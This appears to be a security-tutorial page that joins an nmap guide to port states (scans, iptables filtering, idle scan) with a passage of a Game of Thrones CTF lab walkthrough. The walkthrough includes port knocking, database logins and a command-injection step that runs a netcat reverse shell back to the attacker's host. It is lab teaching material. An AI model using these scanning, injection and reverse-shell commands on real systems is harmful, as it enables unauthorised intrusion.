Comprehensive Guide to nmap port status


Hello friends, several times you might have used NMAP to performing Network scanning for enumerating active Port services of target machine but in some scenarios you don’t get simple message if a port open or close.

Let’s Begin
Requirement
Attacker’s IP:  192.168.1.109 [Kali Linux]
Target’s IP: 192.168.1.119 [Ubuntu]

The states of ports are not their essential properties; it depicts how nmap sees them. In nmap a port is divided into six states:
Open:  This state means that an application on the target machine is listening for connections/packets on that port.
 Closed: This state means ports have no application listening on them, though they could open up at any time.
Filtered: This state means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed
Unfiltered: ports are classified as unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine whether they are open or closed.
Open/Filtered: This indicates that the port was filtered or open but Nmap couldn't establish the state.
Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn't establish the state.

Identify Open Port state
In this case a service or application running on a port is actively accepting TCP, UDP connections. We send TCP packets to port 80 of target machine. We find that the port is open.
nmap –p80 192.168.1.119




We take a look at wireshark and find that 3 way-handshake occurs as given below.
·         Nmap sends SYN packet on port 80
·         Nmap received SYN, ACK packet as response from port 80 which denotes port 80 is open.
·         Nmap sends RST packet




Identify Closed Port state
In this case a service or application on a port is accessible but no application is running on it. When a port is in closed state it sends RST with ACK packet when it receives TCP SYN packet
Nmap -p80 192.168.1.119
Now we have used SYN scan to send TCP SYN packets on port 80 of target machine and found that the target is closed. That is because as soon as it receives TCP SYN packet it sends back TCP RST, ACK packet.




We check wireshark to find more information, as expected as soon as the target machine received TCP SYN packet it replied with TCP RST and NMAP interpreted it as port is closed.
·         Nmap sends SYN packet on port 80
·         Nmap received RST, ACK packet as response from port 80 which denotes port 80 is closed.




Identify Filtered Port state
In this case Nmap is unable to determine whether a port is open because packet filtering is preventing the packets from reaching the port. When a packet is dropped Nmap retries several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.
Let’s use iptables to drop TCP packets on the target machine.
iptables –I INPUT –p tcp –j DROP



Now when we scan the target machine, the packets will be dropped as soon as it receives TCP packets.
nmap -p80 192.168.1.119              
From given below image you can observe that it is now showing state “filtered” for port 80



Let’s take a look at wireshark we find that when Nmap send TCP SYN packet we get no reply from the target machine. This means that a packet filter or firewall is dropping our packets.




Identify Unfiltered Port state
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
We use iptables to drop any TCP packet coming to port 80 in target machine.
iptables-I INPUT -p tcp--dport=80 -j DROP




Now we use nmap ACK scan to scan the target machine to check if there is any firewall or not.
Nmap –sA -p22,80 192.168.1.119
As we can see in given below image the port without firewall shows unfiltered as Nmap is unable to determine if it is open or close.




We can see in wireshark that for port 22 we get a RST packet whereas in case of port 80 the packet is dropped by the target machine.


Identify Open|Filtered Port state
In this case nmap is unable to determine if a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
Let’s use nmap Xmas scan to scan the target machine.
nmap -sX -p80 192.168.1.119

As we can see the nmap scan shows us the port to be open| filtered.


We check wireshark to analysis the sent packets by nmap and we can see we don’t get a reply even if the port is open.


Identify Closed|Filtered Port state
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
We use iptables on our target machine to drop incoming TCP packets on the target machine.
iptables-I INPUT -p tcp-j DROP


We IP ID idle scan on the target machine using 192.168.1.107 as our zombie.
nmap -p80 –sI 192.168.1.107 192.168.1.119
As we can see in idle scan the zombie it is showing state closed|filtered for port 80.


An idle scan consists of three steps that are repeated for each port:
1.       Probe the zombie's IP ID and record it.
2.       Forge a SYN packet from the zombie and send it to the desired port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented.
3.       Probe the zombie's IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.
We check Wireshark and find that find the entire process.



Source: https://nmap.org/book/man.html

Hack the Gamee of Thrones VM (CTF challenge part 2)



We use login the username and password we find in the TXT records.



We use the search provided by the site to check for vulnerabilities.



We use the file manager module and it opened a file manager that lets us access few files.




In /home/aryastark folder we find a file called flag.txt




We download the file and open it in our system and find our 4th flag.




Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.

psql –h 192.168.1.133 –u robinarryn –d mountainandthevale




We find a table called flag, we open it and find a base64 encoded string.




We decode the base64 encode string and find our 5th flag.



Now we check the other tables to check if we miss anything. In one of the tables we find a few names
Select * from arya_kill_list
In arya_kill_list we find these names that seems useful.





Searching through the database we find a rot16 encoded string.




We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.




After enumerating the username we find that TheRedWomanMelisandre is the username.




Now we check the the table and find a secret flag. 





Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.

knock 192.168.1.133 3487 64535 12345




Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.



We use netcat to connect to it, we use the username and password we find in the hint earlier.




In the inbox we find our 6th flag, we also get a hint to use port 1337 and a username and password is given to login.


We login into the site and find that it is git site. 


 
After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.


 




We use netcat to get reverse shell on the site we use “”`code` to execute our code.
nc –e /bin/bash 192.168.1.116 1234


Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.


On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.



Now we use the information above to find the tables available in the database.